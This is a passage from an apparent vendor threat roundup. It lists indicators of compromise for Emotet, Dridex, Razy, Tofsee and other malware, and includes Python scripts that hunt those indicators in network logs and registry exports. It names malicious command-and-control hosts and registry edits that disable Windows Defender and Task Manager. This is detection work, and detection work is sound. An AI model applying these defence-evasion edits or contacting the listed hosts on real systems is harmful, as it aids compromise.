Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 16 and Oct. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
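The caveat above, that a single IOC hit is not a verdict, is easiest to honour when the matching code carries the post's occurrence counts and keeps shared infrastructure apart from real command and control. The Python script below is an added example, not code from Talos or from the accompanying JSON: it refangs the `x[.]y` notation used in the tables that follow, expands CIDR rows such as 172[.]217[.]197[.]138/31, matches parent domains, and files hits on hosts like ctldl[.]windowsupdate[.]com or pastebin[.]com as context rather than detections. The log lines, the log format and the SHARED_INFRA list are constructed assumptions for the demo.

```python
"""Hunt this roundup's network IOCs in proxy/firewall log lines (added example)."""
import ipaddress
import re
from collections import namedtuple

# Rows copied from the tables in this post; the number is the occurrence
# column (how many sandboxed samples contacted the host).
IOCS = {
    "208[.]180[.]207[.]205": 40,        # Emotet
    "poppylon[.]com": 40,               # Emotet
    "ctldl[.]windowsupdate[.]com": 20,  # Emotet rows, but Microsoft's CTL update host
    "pastebin[.]com": 17,               # Dridex rows, a public paste service
    "172[.]217[.]197[.]138/31": 11,     # Dridex rows, CIDR notation
    "srawslorpower[.]com": 12,          # Zegost
}

# Hosts the sandbox OS, a CDN or a public service account for. A hit here is
# context, not a verdict. Assumption: tune this list per environment.
SHARED_INFRA = {"ctldl[.]windowsupdate[.]com", "pastebin[.]com", "apps[.]identrust[.]com"}

# Constructed proxy/firewall lines for the demo (not real traffic).
LOGS = [
    "2020-10-20T09:12:01Z 10.0.0.5 GET http://poppylon.com/wp-content/x.php 200",
    "2020-10-20T09:12:02Z 10.0.0.5 CONNECT ctldl.windowsupdate.com:80 200",
    "2020-10-20T09:12:05Z 10.0.0.5 TCP 208.180.207.205:8080 SYN",
    "2020-10-20T09:13:00Z 10.0.0.7 GET https://pastebin.com/raw/abcd1234 200",
    "2020-10-20T09:14:00Z 10.0.0.9 TCP 172.217.197.139:443 SYN",
    "2020-10-20T09:15:00Z 10.0.0.9 GET http://example.org/ 200",
]

Hit = namedtuple("Hit", "line indicator occurrences tier")
# IPv4 literals or dotted host names that are not glued to other word characters.
TOKEN = re.compile(r"(?<![\w.])((?:\d{1,3}\.){3}\d{1,3}|(?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.I)


def refang(ioc: str) -> str:
    """Turn the post's defanged form back into a matchable host or network."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()


def load(entries):
    """Split indicators into [(ip_network, count)] and {domain: count}."""
    nets, domains = [], {}
    for raw, count in entries.items():
        ioc = refang(raw)
        try:
            nets.append((ipaddress.ip_network(ioc, strict=False), count))
        except ValueError:
            domains[ioc] = count
    return nets, domains


def lookup(token, nets, domains):
    """Return (indicator, count) if token is covered, matching parent domains too."""
    try:
        addr = ipaddress.ip_address(token)
    except ValueError:
        labels = token.lower().split(".")
        for i in range(len(labels) - 1):      # poppylon.com also catches www.poppylon.com
            cand = ".".join(labels[i:])
            if cand in domains:
                return cand, domains[cand]
        return None
    for net, count in nets:
        if addr in net:
            return str(net), count
    return None


def hunt(log_lines, iocs=IOCS, shared=SHARED_INFRA):
    """Return a Hit for every IOC token in the lines, tiered strong or context."""
    nets, domains = load(iocs)
    shared_nets, shared_domains = load(dict.fromkeys(shared, 0))
    hits = []
    for n, line in enumerate(log_lines, 1):
        for tok in TOKEN.findall(line):
            found = lookup(tok, nets, domains)
            if not found:
                continue
            tier = "context" if lookup(tok, shared_nets, shared_domains) else "strong"
            hits.append(Hit(n, found[0], found[1], tier))
    return hits


if __name__ == "__main__":
    for h in hunt(LOGS):
        print(f"line {h.line}: {h.indicator} ({h.occurrences} samples) [{h.tier}]")
```

To use it against real data, replace LOGS with lines from a proxy or DNS export and load IOCS from the JSON the post links to. A strong hit whose occurrence count is close to the sample count (40 of 40 for poppylon[.]com) deserves a ticket; a context hit on its own does not.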

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Doc.Malware.Emotet-9778566-0 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.Dridex-9779159-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Razy-9778111-0 | Trojan | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples establish persistence by creating an auto-execute value in the registry.
Win.Dropper.Tofsee-9781225-0 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.Ponystealer-9778326-0 | Malware | Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT).
Win.Trojan.Zegost-9778522-0 | Trojan | Zegost, also known as Zusy, uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Worm.Aspxor-9778626-0 | Worm | The Aspxor/Asprox botnet has the capability to send spam and to download and execute other samples. This botnet is known for collecting credentials from infected computers.
Win.Packed.Lokibot-9778864-1 | Packed | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from many popular applications. It is commonly pushed via malicious documents delivered via spam emails.

Threat Breakdown

Doc.Malware.Emotet-9778566-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 40 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CREDSSP
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AUTHZ
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AUTHZ
Value Name: Description
1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
208[.]180[.]207[.]205 40
185[.]86[.]155[.]2 40
192[.]35[.]157[.]177 17
72[.]21[.]81[.]240 11
192[.]35[.]177[.]64 3
23[.]3[.]13[.]154 2
8[.]248[.]153[.]254 2
205[.]185[.]216[.]42 1
23[.]3[.]13[.]146 1
23[.]3[.]13[.]88 1
23[.]3[.]13[.]153 1
8[.]248[.]163[.]254 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
poppylon[.]com 40
apps[.]digsigtrust[.]com 20
apps[.]identrust[.]com 20
ctldl[.]windowsupdate[.]com 20
cs11[.]wpc[.]v0cdn[.]net 11
e13678[.]dspb[.]akamaiedge[.]net 8
a767[.]dscg3[.]akamai[.]net 5
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 3
cds[.]d2s7q6s2[.]hwcdn[.]net 1
Files and/or directories created | Occurrences
%HOMEPATH%\P0ge3qt 40
%HOMEPATH%\P0ge3qt\An7ltj5 40
%HOMEPATH%\P0ge3qt\An7ltj5\Hyu7s9nf.exe 40
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 8
%System32%\SettingsHandlers_Notifications\iertutil.exe (copy) 1
%System32%\avicap32\opengl32.exe (copy) 1
%System32%\driverquery\MsSpellCheckingFacility.exe (copy) 1
%System32%\dsdmo\KBDMONST.exe (copy) 1
%System32%\KBDEST\deviceaccess.exe (copy) 1
%System32%\Windows.Media.Editing\WMVXENCD.exe (copy) 1
%System32%\sensrsvc\winbici.exe (copy) 1
%System32%\wlidfdp\SCardSvr.exe (copy) 1
%System32%\xwizard\ntvdm.exe (copy) 1
%System32%\winsqlite3\kd_02_19a2.exe (copy) 1
%System32%\VEDataLayerHelpers\wintrust.exe (copy) 1
%System32%\sechost\dfrgui.exe (copy) 1
%System32%\cngprovider\AxInstSv.exe (copy) 1
%System32%\share\diskpart.exe (copy) 1
%System32%\kdcom\asferror.exe (copy) 1

File Hashes

00ca7ef024a663527f5295900154321d98f6422070bbdf2c9c2abe268370b811
01b41659d4b3ca5ad9f986d2029f5aa621310edb658267e5f478bd784df82874
0592df728f9353ff5f892eba34b3e4a89511bebcf05071738614f9c16c4c640a
0e28ab1cfd540547e916442f60de01263eaf13058f99d4cd5d15a2cd5c078f1a
11c67e93ede508aef0bb3d1c43fd0dcc4109fa2c3c93811c94f36094662b2c23
1c3dd09ac057aa6b432e637992b2d3f2dac3ec4212fbd51771b0bfd7be470110
30e4cb15ec8c1e838060a3e4fa642919313c6b9c0e9b3eee6cb507eee695f828
334cbaeae02aab74b5bcf567ec6fb87be96ca6deead23214dcfb4fc36598b5f7
34ee1271131f57aa2f657049d06dffbee18342c401fa938e4b023ab21831c2e6
3c517984c0e06ae824d98e654224f7fa8fcc3d11deac5b5bf60537b6e1392711
42b0f6b8bb6f89af3b0522edf491d6fd823bd44170bd828f1864212eab862eda
457b10f1fc21e30d9630120fbbd7f0d7681e7ae38d1a3738cc07621995830543
4c9d27731506fe5559fc9219325d333f4f23342a95d4deb70fb7a96f01c47448
511700e616e51e0cbe96e874e76cef55302bd3c56cb5ebafc49d04e2a817ab27
58d9abbb83b6f4df5a5dc7b782ecfc3a0a400197866d76f14500b97d206a7eab
59330f6abd11ccf8373697955746b598be71ca8c69774640b41ebd9650abb398
638ad04b135c3d25ab4940edbd53701ba6bbe07b16b789410b5c1d06dc9aeb9e
65e2d908e6ada4277630aa4113bdde311bd7e49c0e6e656f3102bbb4f61924e3
66039545c0341ab69ac7dac547c88d087e88a6fe13ea338a5fd0397364c0350c
66e5c84f7f729e36ef0aa28a083377587825de39b6871269f4c8f6cc72899a1f
69723a53775c6a9e152a508cdfa347a0e07201d2efca1c2c0ac1112748a9fcd6
69d1dfe8740210f2f3a0ac300794d5f0e25e14f5b86e20086036c2c501fb92b1
70a35d75979116a3deb5a05fd800b019ce1a1e3cfa73a22c3e547f5fdfc702d6
77cdfff917a2408f0ee9abbc0f607fe7cb8967b25ea422571c36ad69debc73e2
7bc4797a66cfb8dbdc6f95c5568595d0229200838644a798b7228d1bde86b554

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9779159-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
17
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
17
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
17
Mutexes | Occurrences
9oyJUqbjXN 1
Bf2tpZ9M5w 1
EuV8ZVITEj 1
SQcVyzvjZr 1
WFi3Wcvd6t 1
gveF9H3Ye9 1
kY4RlCPiLB 1
GnxLrgaOzF 1
Km4UneG1Hy 1
Q4ZpUP7xeD 1
Sv4NU9BDmq 1
h48ApnJeKi 1
uNt6gjNfLb 1
zSlUlKcoLB 1
zxTIAI5gom 1
6scNPwn5g4 1
Dn9wcYJ492 1
NFlFZ5EiVX 1
NZonMQojon 1
ekCslJ2Rsn 1
hcNUrK4xm1 1
m4uDfXBrNb 1
p5EiAI71p9 1
8kCBzcmc7C 1
9bJIPDK3vB 1

*See JSON for more IOCs

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
172[.]217[.]9[.]238 17
172[.]217[.]197[.]138/31 11
172[.]217[.]197[.]102 10
104[.]23[.]98[.]190 9
104[.]23[.]99[.]190 8
172[.]217[.]197[.]100/31 8
172[.]217[.]197[.]113 6
23[.]3[.]13[.]88 4
23[.]3[.]13[.]154 2
72[.]21[.]81[.]240 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
pastebin[.]com 17
ctldl[.]windowsupdate[.]com 6
a767[.]dscg3[.]akamai[.]net 5
www[.]mircqwdgfo[.]com 1
www[.]nsyqngctnr[.]com 1
www[.]so6jhq6bmt[.]com 1
www[.]xc51htnm80[.]com 1
www[.]09d9hr8wrr[.]com 1
www[.]ao1kriznyu[.]com 1
www[.]azczgtct7f[.]com 1
www[.]kau0avuyiy[.]com 1
www[.]lwzskntgmb[.]com 1
www[.]ukyl6yelra[.]com 1
www[.]vithsqbyy5[.]com 1
www[.]wuxdfpz8mg[.]com 1
www[.]8bkzpgdyky[.]com 1
www[.]8nmc5drvsq[.]com 1
www[.]kmmlvscxhm[.]com 1
www[.]q56nioy2vj[.]com 1
www[.]tucwswrbz8[.]com 1
www[.]vg5c299aew[.]com 1
www[.]y0ccjreahm[.]com 1
www[.]z8jewpwgkx[.]com 1
www[.]7ngbwgqdhq[.]com 1
www[.]cjd0djurv2[.]com 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
<malware cwd>\old_<malware exe name> (copy) 17
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 16
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 2

File Hashes

1705fe4bd5c70b526e9641308f2222156f258d09625618786db96fd635c34b63
22b4636e62e9b4a05d23f5e9801137fe45d35ffe53eb1cb9400068a61210004c
32dec8268f9723bdfe1c39cee7cdb8518e888c3fcee9209c42b4db988b3b5ed8
3467c3292cde13ee237a0e71c74424a23f88378dacbdf0f55e7ecc65b89494f8
5f9e01b6e488dde6bab37c7f76a3550c0b71e9794419b9337bf59d7335e38171
757f6d99a33c78be96588ab7866181ec16976b26b14c5ef1d60eccb6249621a5
856f85e9e5b23f438d43e5eeebd67232a9c9f9c7ba0c735a2d2359ae2ddd6456
86e3a311f3351c3ce44d40b6cfed6307b3f01539a16b5b0813c7329e2e8b8ed7
87be3ccc1a1c292b31d50d7e630f92d2c3f9db8c445cc38602b8eb3312e2dd16
a5a0d7d3707d5d146ea0da494bbf36793ca8b0ae99821495b8b1468bd70f36b3
b257778f826dce04e576fac63d9f43ef6f5a1f0c0a2a9bef26618c50c78d07f3
c64bccecb4a20026e28fa723721bcee1c3e404c9f70cadc7fbec176f259553fa
c7753d21c1ec14c0557cca2eefc9ba79be2d3f8b596e521ee67b87ff39fbba9b
d77a1880a026b841fcc1d6e099a0b55fbceddd8bf296ccda6c588112bc00eeea
d95275108d7cd15b5a0146db83a92a2b2ae63f91b502d6266ad6378ef81e94aa
e7edb5a5f54b04b317741bcf40e4d6137938020ceb63d931e99cfec992e2c538
e8158063365c49c968723abf3871af829a20d94abc4f36f9d94d434e55419ff0

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Razy-9778111-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableBehaviorMonitoring
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableOnAccessProtection
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableScanOnRealtimeEnable
6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER 6
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION 6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: a4f5fc179540a0b155d91b489e6811e2
6
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
2
\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN 1
\MICROSOFT\WINDOWS\CURRENTVERSION\RUN 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: edd3d42a2f83b252a9c7c412bfbb2d3c
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN 1
Mutexes | Occurrences
BN[ujPYZXcN-3492256] 1
BN[UgjxTVeo-7460476] 1
BN[hHWOygiD-7803797] 1
BN[WQiRoYio-8046880] 1
BN[bWLfWNal-5539592] 1
BN[KFtOFvJT-2296268] 1
BN[gFUNwfhC-7803696] 1
BN[JfEvrEUj-2926500] 1
BN[ZUwyflFN-2777675] 1
BN[vNyDdEPJ-6604977] 1
BN[OJxSJzNY-3397379] 1
BN[DTWZRpFx-7458457] 1
BN[HfwJwuoH-2635657] 1
BN[vUlxmjdv-9403446] 1
BN[XHorMosH-4808625] 1
BN[ZXcNGNrS-2566595] 1
BN[SoNFBNds-4237733] 1
BN[CdzyaIZL-4946588] 1
BN[hGVOxfiD-7809694] 1
BN[JkHGhPgS-5057699] 1
BN[fbmpFabl-0958259] 1
BN[mnJKTrYC-4025752] 1
BN[EyzxDngn-5979029] 1
BN[mUlXbCpn-7005945] 1
BN[ZknDYZjs-8470587] 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
204[.]79[.]197[.]200 3
192[.]35[.]177[.]64 2
3[.]13[.]191[.]225 2
145[.]14[.]145[.]152 2
72[.]21[.]81[.]240 1
23[.]3[.]13[.]154 1
145[.]14[.]145[.]86 1
77[.]111[.]240[.]113 1
3[.]17[.]7[.]232 1
3[.]134[.]39[.]220 1
104[.]28[.]24[.]228 1
172[.]67[.]154[.]168 1
185[.]27[.]134[.]129 1
125[.]65[.]113[.]76 1
193[.]34[.]76[.]44 1
88[.]86[.]120[.]160 1
129[.]146[.]223[.]100 1
178[.]18[.]181[.]223 1
145[.]14[.]144[.]34 1
51[.]89[.]19[.]244 1
31[.]31[.]196[.]199 1
3[.]134[.]125[.]175 1
3[.]14[.]182[.]203 1
145[.]14[.]145[.]78 1
145[.]14[.]144[.]82 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
igfltrial[.]000webhostapp[.]com 2
maxcdn[.]bootstrapcdn[.]com 1
cdn[.]discordapp[.]com 1
apps[.]digsigtrust[.]com 1
apps[.]identrust[.]com 1
us-east-1[.]route-1[.]000webhost[.]awex[.]io 1
discord[.]gg 1
ctldl[.]windowsupdate[.]com 1
a767[.]dscg3[.]akamai[.]net 1
discord[.]com 1
f49da98a05b2[.]ngrok[.]io 1
kommand[.]rf[.]gd 1
www[.]9551777[.]com 1
ancient-parrot-9[.]loca[.]lt 1
www[.]facebook[.]com[.]ngrok[.]io 1
podpora[.]endora[.]cz 1
siresconsultancy[.]com 1
sf-rp[.]8u[.]cz 1
webadmin[.]endora[.]cz 1
www[.]endora[.]cz 1
cdn[.]sellix[.]io 1
cofix[.]best 1
bot[.]rupturnet[.]cf 1
sellix[.]io 1
api[.]ruselektro[.]com 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
E:\windows_update.exe 3
%SystemRoot%_update.exe 3
%TEMP%\Microsoft 2
%TEMP%\Microsoft\MyClient 2
%TEMP%\Microsoft\MyClient\WindowsUpdate.exe 2
%System32%\Tasks\'60e1f902e85aca7451c5bf1bb2c41258ae8b9967200a5eb2a65724a5f706c4f5' 1
%System32%\Tasks\'1f45c3057cdb6929ffb4f022670ac3e0adddb2283321d31fc31b069fd6dc7485' 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

ThreatGrid


MITRE ATT&CK


Win.Dropper.Tofsee-9781225-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 38 samples
Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
38
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
38
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
38
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
38
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\vocihpvk
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\dwkqpxds
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
2
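The Tofsee registry rows above, together with the Razy rows (Windows Defender policy values, a Run value named with a 32-character hex string) and the Dridex rows (DisableTaskMgr), describe patterns rather than fixed strings: an eight-character upper-case service name, an ImagePath under SysWOW64 in an eight-letter directory, and a Defender path exclusion for that same directory. The Python script below is an added example, not Talos code, that hunts those patterns in a .reg export such as `reg export HKLM\SYSTEM\CurrentControlSet\Services svc.reg` produces. SAMPLE_REG is constructed for the demo: the service name K7ZQ2X9B and the user paths are invented, while the directory name exlrqyet, the Defender policy names and the Run value name are taken from the tables on this page.

```python
"""Hunt registry persistence and defence-evasion patterns from this roundup (added example)."""
import re
from typing import Iterator, List, Tuple, Union

Entry = Tuple[str, str, Union[str, int]]

# Constructed .reg export mixing benign and suspicious keys (demo data only).
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Spooler]
"ImagePath"="C:\\Windows\\System32\\spoolsv.exe"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\K7ZQ2X9B]
"ImagePath"="C:\\Windows\\SysWOW64\\exlrqyet\\qwnxtsae.exe"
"WOW64"=dword:00000001
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\\Windows\\SysWOW64\\exlrqyet"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"a4f5fc179540a0b155d91b489e6811e2"="C:\\Users\\u\\AppData\\Local\\Temp\\Microsoft\\MyClient\\WindowsUpdate.exe"
'''

VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')   # "name"=data
UNESCAPE = re.compile(r'\\(.)')                      # .reg doubles backslashes and escapes quotes

RANDOM_SERVICE = re.compile(r'^[A-Z0-9]{8}$')                                  # Tofsee/Emotet service names
RANDOM_SYSWOW64_DIR = re.compile(r'^C:\\Windows\\SysWOW64\\[a-z]{8}(?:\\|$)')  # eight-letter SysWOW64 dirs
HEX32 = re.compile(r'^[0-9a-f]{32}$', re.I)                                    # Razy-style Run value names
DEFENDER_POLICY_OFF = {"DisableAntiSpyware", "DisableBehaviorMonitoring",
                       "DisableOnAccessProtection", "DisableScanOnRealtimeEnable"}


def parse_reg(text: str) -> Iterator[Entry]:
    """Yield (key, value_name, data) from a .reg export; dword data becomes int."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE.match(line) if key else None
        if not m:
            continue
        name = UNESCAPE.sub(r"\1", m.group(1))
        raw = m.group(2)
        if raw.startswith('"') and raw.endswith('"'):
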